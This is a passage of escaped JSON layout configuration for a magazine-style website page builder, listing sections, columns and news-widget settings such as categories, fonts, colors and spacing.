\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\"